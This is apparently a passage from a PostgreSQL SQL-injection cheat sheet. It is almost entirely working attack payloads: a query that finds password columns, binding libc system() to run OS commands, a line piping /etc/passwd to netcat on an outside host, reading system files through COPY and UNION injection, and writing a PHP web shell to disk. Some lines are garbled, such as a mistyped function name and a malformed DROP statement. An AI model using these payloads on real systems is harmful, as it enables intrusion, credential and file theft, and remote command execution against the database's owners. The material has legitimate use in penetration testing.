If you want to list all the table names that contain a column LIKE '%password%':

SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public') AND attname LIKE '%password%'; 

ASCII Value -> Char

If Statement

Generally not possible in postgres.  However if contrib/dblink is installed (it isn't by default) it can be used to resolve hostnames (assuming you have DBA rights): 

SELECT * FROM dblink('host=put.your.hostname.here user=someuser  dbname=somedb', 'SELECT version()') RETURNS (result TEXT);

Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. "ping pentestmonkey.net".

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; -- priv

SELECT system('cat /etc/passwd | nc 10.0.0.1 8080'); -- priv, commands run as postgres/pgsql OS-level user

CREATE TABLE mydata(t text);
COPY mydata FROM '/etc/passwd'; -- priv, can read files which are readable by postgres OS-level user
...' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; -- get data back one row at a time
...' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; -- get data back one row at a time ...
DROP TABLE mytest mytest;

Write to a file:

CREATE TABLE mytable (mycol text);
INSERT INTO mytable(mycol) VALUES ('<? pasthru($_GET[cmd]); ?>');
COPY mytable (mycol) TO '/tmp/test.php'; --priv, write files as postgres OS-level user.  Generally you won't be able to write to the web root, but it's always work a try.